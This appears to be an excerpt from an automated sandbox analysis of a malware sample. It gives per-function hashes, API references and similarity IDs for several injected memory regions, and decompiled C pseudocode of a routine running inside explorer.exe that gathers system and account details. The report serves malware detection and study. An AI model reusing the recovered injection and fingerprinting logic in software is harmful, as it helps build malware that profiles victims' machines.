Instruction ID: d445a19ce441ef3e4700b59694fe2049dfbce821ff23fb5049dff8e717b46e61
Opcode Fuzzy Hash: 92c3bda60bc7bf52581ae1856752446c32531af44fd0a80c54adb48b73ce42cc
Instruction Fuzzy Hash: 9AB1D3B5A183818FD368CF29C08069AFBE1BFC9714F15891EE9DD97351D770A841CB86

Uniqueness

Uniqueness Score: 100.00%

Function 006D2D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 006D2E41

Strings

fg(, xrefs: 006D2DD0

Memory Dump Source

Source File: 00000005.00000002.485134690.006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d0000_zhAQkCQvME.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: 2a6c5e74a45475b83e9c190098323faad96b2f8ec4d002913f3d6f40be2887c6
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: FE61AAB59193809FC348DF29C58065AFBF1BF88714F11891EE8889B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 006D2593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 006D26B9

Memory Dump Source

Source File: 00000005.00000002.485134690.006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d0000_zhAQkCQvME.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: a5f8835db43a75fe5f537246dac8f77bf742ed39c48fdfa992e8ad49d5917e83
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: 7E51BB75A093818FC364CF28C0A075AFBE2BFD9714F64892EE99997310D671A845CB42

Uniqueness

Uniqueness Score: 0.02%

Function 006D273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 006D26B9
GetProcAddress.KERNEL32 ref: 006D27AE

Memory Dump Source

Source File: 00000005.00000002.485134690.006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d0000_zhAQkCQvME.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: 2828ff44e810548c157f45cb404b9e29e01c77d7774dce23c015050aa5cf13bc
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: 7C31DF76A183428FC724CF29C1A069AF7E2BFD8714F15891EE89997340D774A805CF82

Uniqueness

Uniqueness Score: 0.01%

Function 006D25B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 006D26B9

Memory Dump Source

Source File: 00000005.00000002.485134690.006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d0000_zhAQkCQvME.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: ae4a47cd186590cf7649f1f78ff180ebd44c8d327bb20a47e14cb723a60acb1a
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: 5F219F75A093828BC764CF28D1A0B5ABBE2BBD8714F64492EF59A87350D671E841CB42

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: jkfkdm.exe PID: 2424 Parent PID: 2340 jkfkdm.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01292A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 01292ABA

Memory Dump Source

Source File: 00000006.00000002.478458994.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1290000_jkfkdm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eb797995a8fbca99ff96e89b6986956d03bf6317f5166688418bc8b6883c2b58
Instruction ID: a5b352a16733727477ded73eeddb29b0a99042ed55ead5671fb99942b561d1c3
Opcode Fuzzy Hash: eb797995a8fbca99ff96e89b6986956d03bf6317f5166688418bc8b6883c2b58
Instruction Fuzzy Hash: 5E2127B2E20209DFCF14DFADD9515AEBBF1FF88310B14416AE905A7340D738A941CB95

Uniqueness

Uniqueness Score: 0.01%

Function 01291827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012918F9
VirtualProtect.KERNELBASE ref: 012919B9
VirtualProtect.KERNELBASE ref: 01291CA0

Strings

p, xrefs: 01291B05
Cy, xrefs: 01291855

Memory Dump Source

Source File: 00000006.00000002.478458994.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1290000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 6cb331f660c560f317ed320c61f6af34281bfd0a0f29045892c15fb1a26c5d69
Instruction ID: a5ec594e6aa15f133aa6b8b581af98a63b0eb886bf4ff18148521ecb79e21d90
Opcode Fuzzy Hash: 6cb331f660c560f317ed320c61f6af34281bfd0a0f29045892c15fb1a26c5d69
Instruction Fuzzy Hash: F9D1E075A183818FD324CF29C080B9AFBE1BFD8314F15895EE99D97361E771A841CB92

Uniqueness

Uniqueness Score: 100.00%

Function 01291826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012918F9
VirtualProtect.KERNELBASE ref: 012919B9
VirtualProtect.KERNELBASE ref: 01291CA0

Strings

Cy, xrefs: 01291855

Memory Dump Source

Source File: 00000006.00000002.478458994.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1290000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: b47a4c327fff566dfc447a2b7b6723e2f3a3420f971f2f78a3d70d4393666e89
Instruction ID: ba11a305e7af5377563fbf814f87d7122d92e506c21e5f8e06df12856f2a4620
Opcode Fuzzy Hash: b47a4c327fff566dfc447a2b7b6723e2f3a3420f971f2f78a3d70d4393666e89
Instruction Fuzzy Hash: A3B1D375A183818FD328CF29C08069AFBE1BFD8714F15895EE9DD97361E730A841CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01292D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 01292E41

Strings

fg(, xrefs: 01292DD0

Memory Dump Source

Source File: 00000006.00000002.478458994.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1290000_jkfkdm.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: e86682650cbc9b7ee28a7a15881dadc08a3170ea135b45d89c7e99ac93b4692a
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: 9F61BDB59193418FD748DF29C18065AFBF1BFC8714F11895EE8888B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01292593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9

Memory Dump Source

Source File: 00000006.00000002.478458994.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1290000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: 9cef995cb2a633db6b592da89a8252ecd2a8d6535d30ce7dcc76e80b2453404f
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: 5D51BC79A19380DFC768CF28C19075AFBE2BFC9714F14892EE99997310D771A841CB82

Uniqueness

Uniqueness Score: 0.02%

Function 0129273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9
GetProcAddress.KERNELBASE ref: 012927AE

Memory Dump Source

Source File: 00000006.00000002.478458994.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1290000_jkfkdm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: d981deb4fbc51fa019fe28d20f280247c4f4bdaa9aaea2248e565c08e0b405c7
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: 3931EE76A18341DFC728CF29D19065AF7E2BFC8710F15891EE99997340D770A804CB82

Uniqueness

Uniqueness Score: 0.01%

Function 012925B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9

Memory Dump Source

Source File: 00000006.00000002.478458994.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1290000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 5da7e2f4d9dfc4da574c324df8f4c6ca1f929486e8ee09f182ba06ef442374b1
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: E821AC79A29341DFCB68CF28D19065ABBE1BB88714F50492EF69A97750D670A840CB82

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: jkfkdm.exe PID: 2480 Parent PID: 2444 jkfkdm.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01292A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 01292ABA

Memory Dump Source

Source File: 00000007.00000002.493161236.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1290000_jkfkdm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eb797995a8fbca99ff96e89b6986956d03bf6317f5166688418bc8b6883c2b58
Instruction ID: a5b352a16733727477ded73eeddb29b0a99042ed55ead5671fb99942b561d1c3
Opcode Fuzzy Hash: eb797995a8fbca99ff96e89b6986956d03bf6317f5166688418bc8b6883c2b58
Instruction Fuzzy Hash: 5E2127B2E20209DFCF14DFADD9515AEBBF1FF88310B14416AE905A7340D738A941CB95

Uniqueness

Uniqueness Score: 0.01%

Function 01291827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012918F9
VirtualProtect.KERNELBASE ref: 012919B9
VirtualProtect.KERNELBASE ref: 01291CA0

Strings

p, xrefs: 01291B05
Cy, xrefs: 01291855

Memory Dump Source

Source File: 00000007.00000002.493161236.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1290000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 6cb331f660c560f317ed320c61f6af34281bfd0a0f29045892c15fb1a26c5d69
Instruction ID: a5ec594e6aa15f133aa6b8b581af98a63b0eb886bf4ff18148521ecb79e21d90
Opcode Fuzzy Hash: 6cb331f660c560f317ed320c61f6af34281bfd0a0f29045892c15fb1a26c5d69
Instruction Fuzzy Hash: F9D1E075A183818FD324CF29C080B9AFBE1BFD8314F15895EE99D97361E771A841CB92

Uniqueness

Uniqueness Score: 100.00%

Function 01291826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012918F9
VirtualProtect.KERNELBASE ref: 012919B9
VirtualProtect.KERNELBASE ref: 01291CA0

Strings

Cy, xrefs: 01291855

Memory Dump Source

Source File: 00000007.00000002.493161236.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1290000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: b47a4c327fff566dfc447a2b7b6723e2f3a3420f971f2f78a3d70d4393666e89
Instruction ID: ba11a305e7af5377563fbf814f87d7122d92e506c21e5f8e06df12856f2a4620
Opcode Fuzzy Hash: b47a4c327fff566dfc447a2b7b6723e2f3a3420f971f2f78a3d70d4393666e89
Instruction Fuzzy Hash: A3B1D375A183818FD328CF29C08069AFBE1BFD8714F15895EE9DD97361E730A841CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01292D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 01292E41

Strings

fg(, xrefs: 01292DD0

Memory Dump Source

Source File: 00000007.00000002.493161236.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1290000_jkfkdm.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: e86682650cbc9b7ee28a7a15881dadc08a3170ea135b45d89c7e99ac93b4692a
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: 9F61BDB59193418FD748DF29C18065AFBF1BFC8714F11895EE8888B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01292593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9

Memory Dump Source

Source File: 00000007.00000002.493161236.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1290000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: 9cef995cb2a633db6b592da89a8252ecd2a8d6535d30ce7dcc76e80b2453404f
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: 5D51BC79A19380DFC768CF28C19075AFBE2BFC9714F14892EE99997310D771A841CB82

Uniqueness

Uniqueness Score: 0.02%

Function 0129273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9
GetProcAddress.KERNELBASE ref: 012927AE

Memory Dump Source

Source File: 00000007.00000002.493161236.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1290000_jkfkdm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: d981deb4fbc51fa019fe28d20f280247c4f4bdaa9aaea2248e565c08e0b405c7
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: 3931EE76A18341DFC728CF29D19065AF7E2BFC8710F15891EE99997340D770A804CB82

Uniqueness

Uniqueness Score: 0.01%

Function 012925B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9

Memory Dump Source

Source File: 00000007.00000002.493161236.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1290000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 5da7e2f4d9dfc4da574c324df8f4c6ca1f929486e8ee09f182ba06ef442374b1
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: E821AC79A29341DFCB68CF28D19065ABBE1BB88714F50492EF69A97750D670A840CB82

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: explorer.exe PID: 2600 Parent PID: 2340 explorer.exeUNIQUE

Executed Functions

Function 0151EA50, Relevance: 70.5, APIs: 31, Strings: 9, Instructions: 482
stringlibraryloaderUNIQUELIBRARYCODECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0151EA50(void* __ecx, void* __fp0, struct _OSVERSIONINFOA* _a4, struct HINSTANCE__* _a8, WCHAR* _a12, signed int _a16) {
				WCHAR* _v8;
				union _SID_NAME_USE _v12;
				WCHAR* _v16;
				long _v20;
				WCHAR* _v24;
				long _v28;
				long _v32;
				WCHAR* _v36;
				short _v564;
				char _v628;
				long _v632;
				char _v3140;
				intOrPtr _t145;
				void** _t147;
				signed int _t149;
				signed int _t150;
				signed int _t157;
				int _t188;
				intOrPtr _t192;
				intOrPtr _t199;
				short _t201;
				signed int _t204;
				signed int _t206;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				intOrPtr _t225;
				WCHAR* _t266;
				WCHAR* _t296;
				WCHAR* _t299;
				WCHAR* _t357;
				void* _t373;
				void* _t375;
				void* _t377;
				void* _t387;
				void* _t389;
				void* _t396;

				_t396 = __fp0;
				_v28 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				E01513BA0(__ecx, _a4, 0, 0x1ed8);
				 *((intOrPtr*)(_a4 + 0x1a54)) = GetCurrentProcessId();
				E01515480(GetTickCount() +  *((intOrPtr*)(_a4 + 0x1a54)), _a4 + 0xa5c);
				_t375 = _t373 + 0x14;
				if(GetModuleFileNameW(0, _a4 + 0x1a58, 0x105) != 0) {
					__eflags = _a4 + 0x1a58;
					_t145 = E015168D0(_a4 + 0x1a58, _a4 + 0x1a58, 0x5c);
					_t375 = _t375 + 8;
					 *((intOrPtr*)(_a4 + 0x1c64)) = _t145;
				} else {
					while(0 != 0) {
					}
				}
				_t147 = E0151D770(GetCurrentProcess()); // executed
				 *(_a4 + 0x104) = _t147;
				_t257 =  *( *(_a4 + 0x104));
				_t149 = E0151D920( *( *(_a4 + 0x104)));
				_t377 = _t375 + 8;
				__eflags = _t149;
				if(_t149 == 0) {
					_t150 = E0151D810(_t257); // executed
					__eflags = _t150;
					if(_t150 <= 0) {
						 *((intOrPtr*)(_a4 + 0x408)) = 1;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L18;
							}
						}
					} else {
						 *((intOrPtr*)(_a4 + 0x408)) = 2;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
					}
				} else {
					 *((intOrPtr*)(_a4 + 0x408)) = 3;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L18:
				 *(_a4 + 0x40c) = _a8;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_v28 = 0x80;
				_v20 = 0x80;
				_t157 = LookupAccountSidW(0,  *( *(_a4 + 0x104)), _a4 + 0x208,  &_v28, _a4 + 0x308,  &_v20,  &_v12); // executed
				__eflags = _t157;
				if(_t157 == 0) {
					_v32 = GetLastError();
					__eflags = _a4 + 0x308;
					E01513CA0(_a4 + 0x308, 0x80, L"LookupAccountSidW() err %u", _v32);
					_t377 = _t377 + 0x10;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L25;
						}
					}
				}
				L25:
				__eflags = _a16 & 0x00000002;
				if((_a16 & 0x00000002) == 0) {
					__eflags = _a16 & 0x00000004;
					if((_a16 & 0x00000004) == 0) {
						_t266 = _a4 + 0x410;
						__eflags = _t266;
						GetModuleFileNameW( *(_a4 + 0x40c), _t266, 0x20a);
					} else {
						_v16 = _a12;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						lstrcpynW(_a4 + 0x410, _v16, 0x105);
						 *0x153a950 = _v16[0x17f];
						 *0x153a954 = _v16[0x183];
						 *0x153a958 = _v16[0x185];
						 *0x153a95c = _v16[0x189];
						 *0x153a960 = _v16[0x18b];
						 *0x153a964 = _v16[0x18f];
						 *0x153a968 = _v16[0x191];
						 *0x153a96c = _v16[0x195];
						 *0x153a970 = _v16[0x197];
						 *0x153a974 = _v16[0x19b];
					}
				} else {
					_v8 = _a12;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					lstrcpynW(_a4 + 0x410, _v8, 0x20a);
				}
				 *((intOrPtr*)(_a4 + 0x61c)) = E015168D0(__eflags, _a4 + 0x410, 0x5c);
				lstrcpynW(_a4 + 0xc4, E015168D0(__eflags, _a4 + 0x410, 0x5c), 0x40);
				 *((short*)(_a4 + 0xbc + lstrlenW(_a4 + 0xc4) * 2)) = 0;
				E01516E30(_a4 + 0xc4, _a4 + 0xc4, _a4 + 0xa4, 0x20);
				E01516920(_a4 + 0x410, _a4 + 0x620);
				lstrcpynW(_a4 + 0x850, _a4 + 0x620, 0x105);
				lstrcatW(_a4 + 0x850, "\\");
				lstrcatW(_a4 + 0x850, _a4 + 0xc4);
				_v36 = E01515230(_a4 + 0xc4, 0x188c);
				lstrcatW(_a4 + 0x850, _v36);
				E01515460( &_v36);
				E015169C0(__eflags, _a4 + 0x82a, 0xa, 0xf, _a4 + 0xa5c);
				_t188 = lstrlenA(_a4 + 0xa4);
				__eflags = _a4 + 0xa4;
				E0151F880(_a4 + 0xa4, _t396, E0151C990(_a4 + 0xa4, _t188, 0), _a4 + 0x1420);
				_t192 = E0151D9A0(GetCurrentProcess()); // executed
				_t387 = _t377 + 0x54;
				 *((intOrPtr*)(_a4 + 0x1430)) = _t192;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				E01513BA0(0, _a4, 0, 0x9c);
				_a4->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_a4);
				 *((intOrPtr*)(_a4 + 0x1dac)) = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				_t199 = E0151E8D0(_a4); // executed
				 *((intOrPtr*)(_a4 + 0xa0)) = _t199;
				_push( *((intOrPtr*)(_a4 + 0xa0))); // executed
				_t201 = E0151E900(); // executed
				_t389 = _t387 + 0x10;
				 *((short*)(_a4 + 0x9c)) = _t201;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_t204 = GetWindowsDirectoryW(_a4 + 0x1434, 0x104);
				__eflags = _t204;
				if(_t204 != 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L48;
						}
					}
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L48:
				_t206 = GetEnvironmentVariableW(L"SystemRoot",  &_v564, 0x104);
				__eflags = _t206;
				if(_t206 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t357 = _a4 + 0x1434;
					__eflags = _t357;
					SetEnvironmentVariableW(L"SystemRoot", _t357);
				}
				_t209 = GetEnvironmentVariableW(L"USERPROFILE", _a4 + 0x1848, 0x209);
				__eflags = _t209;
				if(_t209 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_push("TEMP");
					E01513CA0(_a4 + 0x1848, 0x20a, L"%s\\%s", _a4 + 0x1434);
					_t389 = _t389 + 0x14;
					_t299 = _a4 + 0x1848;
					__eflags = _t299;
					SetEnvironmentVariableW(L"USERPROFILE", _t299);
				}
				_t210 = GetEnvironmentVariableW(L"TEMP", _a4 + 0x163e, 0x20a);
				__eflags = _t210;
				if(_t210 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t296 = _a4 + 0x1848;
					__eflags = _t296;
					SetEnvironmentVariableW(L"TEMP", _t296);
				}
				_t211 = GetEnvironmentVariableA("SystemDrive",  &_v628, 0x3f);
				__eflags = _t211;
				if(_t211 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					SetEnvironmentVariableA("SystemDrive", "C:");
				}
				_v632 = 0x7f;
				GetComputerNameW(_a4 + 0x1db0,  &_v632); // executed
				E01515480(E0151C990(_a4 + 0x1420, lstrlenA(_a4 + 0x1420), 0),  &_v3140);
				__eflags = _a4 + 0x1c68;
				E01515730( &_v3140,  &_v3140, _a4 + 0x1c68, 0x20);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a4 + 0x1c88;
				E015169C0(_a4 + 0x1c88, _a4 + 0x1c88, 0x14, 0x1e,  &_v3140);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a16 & 0x00000001;
				if((_a16 & 0x00000001) == 0) {
					_t225 = E0151E5C0(); // executed
					 *((intOrPtr*)(_a4 + 0x1ca8)) = _t225;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L74;
						}
					}
				}
				L74:
				return 1;
			}

0x0151ea50
0x0151ea59
0x0151ea60
0x0151ea67
0x0151ea6e
0x0151ea75
0x0151ea87
0x0151ea98
0x0151eab8
0x0151eabd
0x0151ead9
0x0151eae8
0x0151eaef
0x0151eaf4
0x0151eafa
0x0151eadb
0x0151eadb
0x0151eadf
0x0151eae1
0x0151eb07
0x0151eb12
0x0151eb21
0x0151eb24
0x0151eb29
0x0151eb2c
0x0151eb2e
0x0151eb45
0x0151eb4a
0x0151eb4c
0x0151eb66
0x0151eb70
0x0151eb70
0x0151eb72
0x00000000
0x00000000
0x0151eb74
0x0151eb4e
0x0151eb51
0x0151eb5b
0x0151eb5b
0x0151eb5d
0x00000000
0x00000000
0x0151eb5f
0x0151eb61
0x0151eb30
0x0151eb33
0x0151eb3d
0x0151eb3d
0x0151eb3f
0x00000000
0x00000000
0x0151eb41
0x0151eb43
0x0151eb76
0x0151eb7c
0x0151eb82
0x0151eb82
0x0151eb84
0x00000000
0x00000000
0x0151eb86
0x0151eb88
0x0151eb8f
0x0151ebc3
0x0151ebc9
0x0151ebcb
0x0151ebd3
0x0151ebe7
0x0151ebee
0x0151ebf3
0x0151ebf6
0x0151ebf6
0x0151ebf8
0x00000000
0x00000000
0x0151ebfa
0x0151ebf6
0x0151ebfc
0x0151ebff
0x0151ec02
0x0151ec31
0x0151ec34
0x0151ecfb
0x0151ecfb
0x0151ed0c
0x0151ec3a
0x0151ec3d
0x0151ec40
0x0151ec40
0x0151ec42
0x00000000
0x00000000
0x0151ec44
0x0151ec59
0x0151ec68
0x0151ec76
0x0151ec85
0x0151ec94
0x0151eca2
0x0151ecb1
0x0151ecc0
0x0151ecce
0x0151ecdd
0x0151ecec
0x0151ecec
0x0151ec04
